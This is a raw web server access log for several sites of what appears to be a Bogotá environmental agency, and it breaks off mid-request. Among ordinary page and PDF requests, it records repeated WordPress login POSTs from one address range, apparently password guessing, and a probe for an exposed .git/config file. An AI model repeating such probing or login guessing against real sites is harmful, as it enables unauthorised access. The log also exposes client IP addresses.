181.204.226.82 - - [14/Aug/2022:12:48:42 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
181.204.226.82 - - [14/Aug/2022:12:48:42 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
181.204.226.82 - - [14/Aug/2022:12:48:43 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
181.204.226.82 - - [14/Aug/2022:12:48:45 -0500] "POST /appsia/controlador HTTP/1.1" 200 7729
181.204.226.82 - - [14/Aug/2022:12:48:45 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
186.28.161.217 - - [14/Aug/2022:12:49:42 -0500] "GET / HTTP/1.1" 200 4720
186.28.161.217 - - [14/Aug/2022:12:49:42 -0500] "GET /js/url.js HTTP/1.1" 404 1294
186.28.161.217 - - [14/Aug/2022:12:49:42 -0500] "GET /css/style.css HTTP/1.1" 200 3473
186.28.161.217 - - [14/Aug/2022:12:49:42 -0500] "GET /fonts/icomoon/style.css HTTP/1.1" 200 79820
186.28.161.217 - - [14/Aug/2022:12:49:42 -0500] "GET /css/bootstrap.min.css HTTP/1.1" 200 178212
186.28.161.217 - - [14/Aug/2022:12:49:42 -0500] "GET /favicon.ico HTTP/1.1" 404 1294
191.102.224.199 - - [14/Aug/2022:12:49:44 -0500] "GET / HTTP/1.1" 200 4720
191.102.224.199 - - [14/Aug/2022:12:49:45 -0500] "GET /css/bootstrap.min.css HTTP/1.1" 200 178212
191.102.224.199 - - [14/Aug/2022:12:49:45 -0500] "GET /fonts/icomoon/style.css HTTP/1.1" 200 79820
191.102.224.199 - - [14/Aug/2022:12:49:45 -0500] "GET /js/url.js HTTP/1.1" 404 1294
191.102.224.199 - - [14/Aug/2022:12:49:45 -0500] "GET /css/style.css HTTP/1.1" 200 3473
186.28.161.217 - - [14/Aug/2022:12:50:05 -0500] "POST /procesar.php HTTP/1.1" 200 999
172.22.2.4 - - [14/Aug/2022:12:50:07 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%206%20del%2019%20de%20julio%20de%202013.pdf HTTP/1.1" 304 -
45.95.55.5 - - [14/Aug/2022:12:51:11 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/Aug/2022:12:49:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.28.161.217 - - [14/Aug/2022:12:51:51 -0500] "GET /114-arboles-plantados-en-entrenubes-uno-de-los-pulmones-del-suroriente-de-bogota.html HTTP/1.1" 200 834
172.22.2.4 - - [14/Aug/2022:12:50:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58946
216.245.221.92 - - [14/Aug/2022:12:52:21 -0500] "HEAD / HTTP/1.1" 200 -
186.28.53.203 - - [14/Aug/2022:12:52:32 -0500] "GET /114-arboles-plantados-en-entrenubes-uno-de-los-pulmones-del-suroriente-de-bogota.html HTTP/1.1" 200 834
172.22.2.4 - - [14/Aug/2022:12:52:38 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2999&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1103
172.22.2.4 - - [14/Aug/2022:12:52:38 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
201.245.192.253 - - [14/Aug/2022:12:52:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
190.61.47.165 - - [14/Aug/2022:12:52:48 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
190.61.47.165 - - [14/Aug/2022:12:52:48 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
190.61.47.165 - - [14/Aug/2022:12:52:48 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
190.61.47.165 - - [14/Aug/2022:12:52:48 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
190.61.47.165 - - [14/Aug/2022:12:52:53 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
190.61.47.165 - - [14/Aug/2022:12:52:53 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
190.61.47.165 - - [14/Aug/2022:12:52:53 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 205703
172.22.2.4 - - [14/Aug/2022:12:53:20 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%20No.%2000018%20del%2002%20de%20diciembre%20del%202020.pdf HTTP/1.1" 200 276868
190.61.47.165 - - [14/Aug/2022:12:53:45 -0500] "GET /BLA/resoluciones/AUTOS%202022/3016.pdf HTTP/1.1" 200 557051
172.22.2.4 - - [14/Aug/2022:12:54:03 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [14/Aug/2022:12:54:03 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [14/Aug/2022:12:54:03 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [14/Aug/2022:12:54:03 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [14/Aug/2022:12:54:03 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [14/Aug/2022:12:54:03 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [14/Aug/2022:12:54:03 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [14/Aug/2022:12:54:03 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [14/Aug/2022:12:54:03 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [14/Aug/2022:12:54:03 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [14/Aug/2022:12:54:03 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [14/Aug/2022:12:54:03 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [14/Aug/2022:12:54:03 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [14/Aug/2022:12:54:03 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [14/Aug/2022:12:54:03 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [14/Aug/2022:12:54:03 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [14/Aug/2022:12:54:03 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [14/Aug/2022:12:54:03 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [14/Aug/2022:12:54:03 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [14/Aug/2022:12:54:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
3.238.252.196 - - [14/Aug/2022:12:54:57 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 304 -
185.119.81.104 - - [14/Aug/2022:12:55:15 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [14/Aug/2022:12:55:16 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
185.119.81.104 - - [14/Aug/2022:12:56:15 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [14/Aug/2022:12:56:16 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [14/Aug/2022:12:55:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Aug/2022:12:57:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2022:12:57:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [14/Aug/2022:12:56:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60865
190.61.47.165 - - [14/Aug/2022:12:58:03 -0500] "GET /BLA/resoluciones/AUTOS%202022/2923.pdf HTTP/1.1" 200 412856
207.46.13.188 - - [14/Aug/2022:12:58:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%202050-2099.tif HTTP/1.1" 200 4179547
69.171.231.5 - - [14/Aug/2022:12:59:04 -0500] "GET /images/acuerdos-enero-19.jpg HTTP/1.1" 200 56694
185.119.81.105 - - [14/Aug/2022:13:01:13 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [14/Aug/2022:13:01:14 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [14/Aug/2022:13:02:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2022:13:02:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [14/Aug/2022:13:01:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2022:13:02:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
173.252.95.24 - - [14/Aug/2022:13:06:30 -0500] "GET /images/lluvias-arboles-4-junio.jpeg HTTP/1.1" 200 117524
173.252.95.12 - - [14/Aug/2022:13:06:31 -0500] "GET /images/Junio%2002-experiencias-jardines-verticales-sda.jpeg HTTP/1.1" 200 31171
173.252.95.118 - - [14/Aug/2022:13:06:31 -0500] "GET /images/empresas-industrias-forestales-1-junio.jpg HTTP/1.1" 200 44019
173.252.95.20 - - [14/Aug/2022:13:06:32 -0500] "GET /images/pieza-grafica-semana-ambiental-30.jpg HTTP/1.1" 200 38850
173.252.95.20 - - [14/Aug/2022:13:06:33 -0500] "GET /images/energia-eficiencia-26-mayo.jpg HTTP/1.1" 200 46417
173.252.95.18 - - [14/Aug/2022:13:06:33 -0500] "GET /images/facebook-live-ivc-MAYO27.png HTTP/1.1" 200 480404
173.252.95.20 - - [14/Aug/2022:13:06:34 -0500] "GET /images/jornadas-llantas-usadas-23-mayo.jpg HTTP/1.1" 200 148376
173.252.95.18 - - [14/Aug/2022:13:06:34 -0500] "GET /images/jardines-verticales-plantas-24-mayo.jpg HTTP/1.1" 200 148288
173.252.95.117 - - [14/Aug/2022:13:06:34 -0500] "GET /images/visita-suspension-humedal-techo-24-mayo.jpg HTTP/1.1" 200 57365
173.252.95.3 - - [14/Aug/2022:13:06:34 -0500] "GET /images/la-vieja-mayo-24.jpg HTTP/1.1" 200 58217
173.252.95.11 - - [14/Aug/2022:13:06:35 -0500] "GET /images/bogota-polvo-sahara-23-mayo.jpg HTTP/1.1" 200 35039
173.252.95.24 - - [14/Aug/2022:13:06:35 -0500] "GET /images/control-madera-ilegal-24-mayo.jpg HTTP/1.1" 200 48269
173.252.95.21 - - [14/Aug/2022:13:06:36 -0500] "GET /images/feria-servicios-tramites-19-mayo.jpg HTTP/1.1" 200 40581
173.252.95.117 - - [14/Aug/2022:13:06:36 -0500] "GET /images/reciclaton-mayo-3-mayo.jpg HTTP/1.1" 200 278453
173.252.95.21 - - [14/Aug/2022:13:06:37 -0500] "GET /images/actividades-dia-aves-16-mayo.jpg HTTP/1.1" 200 147089
216.245.221.92 - - [14/Aug/2022:13:07:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2022:13:07:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [14/Aug/2022:13:07:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2022:13:07:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56005
185.119.81.98 - - [14/Aug/2022:13:10:04 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.98 - - [14/Aug/2022:13:10:05 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
216.245.221.92 - - [14/Aug/2022:13:12:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2022:13:12:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [14/Aug/2022:13:12:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2022:13:13:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
186.102.72.116 - - [14/Aug/2022:13:16:13 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+pMOoRqSfJJLLamzYc7D6RP+kZ0nRIistHnGHlbzfqWM5wKJRQ6JMx&y=U2FsdGVkX1+XQhCS9zDFudDI2dxvtu20Vjkj4qjgsr807R+uDmuAGMPam37WFKHE HTTP/1.1" 200 30
186.102.72.116 - - [14/Aug/2022:13:16:14 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/IpM0BnANIfEo9e5n2vPJzTqJ8W0vspQI3ho6Qwv9yWUkm+/1uypbUbm0EHnyKBlShxTSQf+PdT69bQIhM7EgMHirr2EdjvmE=&u=U2FsdGVkX1+Kq2Fy0HmmyJUWBfaI6diMUa34J3IMGG7dgn2of9bLKPYEwpN6lcMp&y=U2FsdGVkX1+XQhCS9zDFudDI2dxvtu20Vjkj4qjgsr807R+uDmuAGMPam37WFKHE HTTP/1.1" 200 97
186.102.72.116 - - [14/Aug/2022:13:16:14 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/D3/g6eivz+TtkcQbDGGs1HAksHT7ecBdiunuP9baVCHKD3g1V7Doou21DC4Sar1mzn+A2AE3qUlIfaLXZaNF1FjKGaSy5U7TqrxWvHwgnT7eQq5LTOue/z62VEqKRtto+m1w/k1m7QEO1gRfJBaCy3uZeVPXL/sxI2gW4wsx3B2WlUmttbt7iZwalyRcTMLNZ0X3DY1oeE/AzIX6z7FV+LOK2L43edgQlSGGnKjDdl9ppslBx30zcwyaOsz56FIcCgF+ujXRFBahSlyW7ksdxF/3LieT1j/vqBnxfQiji9wGPWmGuWq3UJtjmY4OGa5pM/wHBoLvtjopcn5I+B6Ix0XSQPr7C1UkxlENtZa3M94CHhaxadggu91jhOYYQOt80Pap1i6WF6nyv163AXXkRYyH9ptU4SIx9fWaJ4kpqW6VMSQckjRb9oPOa0FNgMlUOT2yLEZ2OkVireit2ezKpxUDXv6z1SY03B0erPc16yxhcMZSnrtmYlTkkoHdKFaF0iJFOMsV717I8jk3B5xnBmggigjltgg5g3Vyrq+sML1R7Wf4bW2AiNMyptm6ZGV6OQVl5rtfG1XY3mHqQW0Vzx6LBbPZ3R0+zH0HMUhJA/6BoZGJRUfAtfK+AbP0tp0PuQ/bk4ETj300h8+AOCPeUptsbb4lqNpOavVRqajWQ+mEcq7ROEKbH2PIh7KASlMDE7n0Saro8sFvunaVE+RQ7IympddRRGZppjgS9+US5+MbsqMyivf62Fx6nxeEtTXIxSFXukd7/ZTYOv+Y6U6z6010QxUhkNKaxDDrPuKcHsNi/D00ZDPTAe12F9Pdk20LOUf6Qr4PjXyW82APZjYYorxh2BKiBc90IY5WtoesxSoShZSZfYxOhgJ2T1ZA+jvWXBrVT6Td5YW6577weDfrH96ZnJa0xsHsKL5j1aW3Ci0u34t0lfLDDe1fSfq2mgwIkQwmMcUwZER7S8mrf83p3gCDKOdC9eKtZi+HE8fUZFjC1AuCtTlxk2QMnEJqyasNdNq5tOBMU31+OGmxpV8ParcKS59m1bJkQEeb/raeMieJ2nRh+YqjXQKP48Ud391tAVYHNN3P2VppsVyIV/Ptt87GXvB6ZxFrjuy7HsUimhG19s7TV4hwd4InSGgLvdLIsQdKF9Apdfv0WvgMHzS4zMUhy1Knp2N6oYw16yEHSrq53lRnSgoreiFE+JCyw8k4dduQBelRNRsVSkCuwloZmjhSZXtelJwESF9bvuivkWeRemRFPa2fm/4K5wP/C3yNtz3hd8YYOICvZOXmeBx3+yLhRYOze9uxSUh/7NVQMq9yejUiXw5pbYACXNOMknv5lt6eEOQN004k0P4m8JjcS196APdKV2Ro=&u=U2FsdGVkX1+Kq2Fy0HmmyJUWBfaI6diMUa34J3IMGG7dgn2of9bLKPYEwpN6lcMp&y=U2FsdGVkX1+XQhCS9zDFudDI2dxvtu20Vjkj4qjgsr807R+uDmuAGMPam37WFKHE HTTP/1.1" 200 1652
186.102.72.116 - - [14/Aug/2022:13:16:14 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19ZEHwOgLWCeBVLVdIE2HgmwrjaXZjnMB7ezCBXqJj1FSOKlQoOgK+kjv1mCiyUPG+L8B/wZTz+USXcfsWTqdVRZeVAA8lsPplKT1SzA7zVtSd2NL1N0Z8fjFRziMIFL70HLulKRls2Qmnnj7xtacOOfAAxsFn5tzzp9gGbrhBaR46M4kN/8oVn9MLQZ4kCG/TwS482oeEdEI4XwkmC5zcy/WO4Q42u9Y4DfexQNoXkl8tdZ/d2wSCCY0cococZ8dNkThD2iBT6Al6dIAiUz+VeAQYpLsKLtmI=&u=U2FsdGVkX1+Kq2Fy0HmmyJUWBfaI6diMUa34J3IMGG7dgn2of9bLKPYEwpN6lcMp&y=U2FsdGVkX1+XQhCS9zDFudDI2dxvtu20Vjkj4qjgsr807R+uDmuAGMPam37WFKHE HTTP/1.1" 200 176
186.102.72.116 - - [14/Aug/2022:13:16:14 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1+pMOoRqSfJJLLamzYc7D6RP+kZ0nRIistHnGHlbzfqWM5wKJRQ6JMx HTTP/1.1" 200 30992
216.245.221.92 - - [14/Aug/2022:13:17:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2022:13:17:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [14/Aug/2022:13:17:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [14/Aug/2022:13:17:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
173.252.107.23 - - [14/Aug/2022:13:18:37 -0500] "GET /mas-de-60-personas-privadas-de-la-libertad-se-certificaron-como-dinamizadores-ambientales.html HTTP/1.1" 206 951
190.24.100.143 - - [14/Aug/2022:13:19:05 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.24.100.143 - - [14/Aug/2022:13:19:05 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.24.100.143 - - [14/Aug/2022:13:19:05 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
190.24.100.143 - - [14/Aug/2022:13:19:05 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/nivo-slider/demo/images/bannertrafico_optimized.jpg HTTP/1.1" 200 42578
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/nivo-slider/demo/images/bannertortuga_optimized.jpg HTTP/1.1" 200 39066
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/nivo-slider/demo/images/Bannermujeresquereverdecen.jpg HTTP/1.1" 200 46558
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/nivo-slider/demo/images/bannerrutaesperanza.jpg HTTP/1.1" 200 55560
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/nivo-slider/demo/images/Bannersedeelectronica.jpg HTTP/1.1" 200 40383
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/nivo-slider/demo/images/banneraire2021.jpg HTTP/1.1" 200 265101
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/nivo-slider/demo/images/Bannerplasticosseptiembre.jpg HTTP/1.1" 200 45633
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/nivo-slider/demo/images/bannerresiduoshospitalariosagosto.jpg HTTP/1.1" 200 36499
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopularcrr68.jpg HTTP/1.1" 200 51887
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopular.jpeg HTTP/1.1" 200 41707
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/nivo-slider/demo/images/bannerclases2021.jpg HTTP/1.1" 200 68230
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/nivo-slider/demo/images/bannercapacitacionesbogota.jpg HTTP/1.1" 200 42416
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/nivo-slider/demo/images/Bannerenvases.jpg HTTP/1.1" 200 37316
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
190.24.100.143 - - [14/Aug/2022:13:19:06 -0500] "GET /galeria/nivo-slider/demo/images/Bannervirtualescanales.jpg HTTP/1.1" 200 174544
190.24.100.143 - - [14/Aug/2022:13:19:07 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
190.24.100.143 - - [14/Aug/2022:13:19:07 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
172.22.2.4 - - [14/Aug/2022:13:19:31 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20Sentencia%20T-1077,%202%20corregida.doc HTTP/1.1" 304 -
207.46.13.148 - - [14/Aug/2022:13:20:15 -0500] "GET /portaldeninos/comments/feed/ HTTP/1.1" 200 1823
172.22.2.4 - - [14/Aug/2022:13:18:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2022:13:20:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45914
201.245.192.253 - - [14/Aug/2022:13:20:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44432
157.55.39.84 - - [14/Aug/2022:13:20:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/0995.pdf HTTP/1.1" 304 -
172.22.2.4 - - [14/Aug/2022:13:19:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58566
216.245.221.92 - - [14/Aug/2022:13:22:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2022:13:22:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [14/Aug/2022:13:24:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2022:13:25:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57716
216.245.221.92 - - [14/Aug/2022:13:27:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2022:13:27:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
157.55.39.84 - - [14/Aug/2022:13:29:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/1519.pdf HTTP/1.1" 304 -
201.245.192.253 - - [14/Aug/2022:13:30:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45914
201.245.192.253 - - [14/Aug/2022:13:30:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44432
172.22.2.4 - - [14/Aug/2022:13:31:24 -0500] "GET /BLA/boletinlegal/.git/config HTTP/1.1" 404 1018
172.22.2.4 - - [14/Aug/2022:13:30:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Aug/2022:13:32:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2022:13:32:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [14/Aug/2022:13:31:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
216.245.221.92 - - [14/Aug/2022:13:37:21 -0500] "HEAD / HTTP/1.1" 200 -
186.102.96.113 - - [14/Aug/2022:13:37:23 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+i1b3PAsAHb/4Koy9oy/DiMlAoBMgb2L0T6eqi5rwEmKZw+W8ucHUX&y=U2FsdGVkX188nluHpRX6DcPZc2rJ6CcIiyrYevfbieSKYm8UzinWWLKmQG9ityog HTTP/1.1" 200 30
186.102.96.113 - - [14/Aug/2022:13:37:23 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18hfG9XHQTb0S8DuuNGF5OEDOIXqOl0mEhOKYitXsN9VTHC7CFvLTgDtoerCTmOLRgg0m+ol5WpwPKExxjTSjJBrjUKUv8LC8g=&u=U2FsdGVkX18ljZa3IqOKi6wTYtllh/Tbcbl7bN/1ngT8PWMIDAum3JosbW4T8qLJ&y=U2FsdGVkX188nluHpRX6DcPZc2rJ6CcIiyrYevfbieSKYm8UzinWWLKmQG9ityog HTTP/1.1" 200 97
186.102.96.113 - - [14/Aug/2022:13:37:23 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+Kf3yGis8WCKNu3YH71TlNmA+jDiMNxJNqPj6deZCp1H8F0LxKx4HnGVm1e+a4coSf3mXbwlb6r8fM8e7+WvORg1nRCmEx0XudNXFT/UyHvAKEmj7+q7u6HlKSotMufr4iiSIiF1t7oFqoI2GVJBNirK6fYXuzVztRwFxqhjgcYGpSZ9maU/J7DEJ9xFhPN2C8rfa0uaZ4CiMXZYXloUJ8ISRathByT76UFCHycULmWNyk/hXzLGpTUZgLZjrmUile8ovgaFv9sP8rPYLOdz/g78yLq+6PARfuPE9J0P29atj1r0bqJLZiMjgXSkY1MtcxWG9b9nFIinxssNCZ1XkY1GsbrJJ76cRUfUiyRZ3BeDUBwZRVO1NYlyuOy6NmZJz4OsdvFn6cA9sNjyFs5gwkdrqDdy3Xc+PHIfuM/GrFF2n4hI4VHT65bglb4l786gHlMdG/6e3baB7NAuhRlYOiq50HUVj60LJ84W4zJ8P2hnZ3yK5a0JW56UokS0BdDaGr4qUP/SGhULb3iuLNvOPedNaFhJ4kwazvItOlfQ32Kabk7Z1OcrUi54ZBkz9SbC+Qfkq1W028w66vrtkE0j09JBnGYcQvNt2qkwKHQfHW7iuXM1Es89DBO7689oadZaptI4QpC/3EKAIcxJmKjGgUq3SCXM2AjE0UmpU4SsolNfXiHBqWPV/zfCp/J3cDrlhguNziaQNl/oGbcKt5SROWjIkrZ20lqPY+hxgs07BSmyzE4qkL4iudWCuGcb1q0hFUfO4khrsKnmepLnx94So5ufVPYSyJSJ/3Q2M7RnhfWMi97aqoTspFXImsEkduVCJvG9twi4PQYbhFGmYrZgMzrZFCrT5ZpMGNLs/8UL+jPkWJnjbgu1t8KGF09oO5PP0xfWDaTgUk5ySuPOP4MMOgTRgjYDW7zp3SLViVvtjaA7e9tjHr6KeFsfF85t0dAwKAxz2w0H6lMywgT6xrOcrgWYXO96NcbeWkbqZw/2aI+aOqFPV/JwGaVr7YN3G+rTBvz/CayzB9x2cWxK0R/eYs0+LRMdYPjp7HNofSYcmyVZWVoZcW77RRGmwPCu8m7DhlR04Bd0OnEC2zG0DrgmioX2NzNVEU4TQNPgveNpD8GnYmGDpU5zzx0A+h4EkAsQImg3Sre382iTti3CPm/uYatiWsfnhaIuRrDj9M8CNMAdwDL7WXmPwlrMHFRHc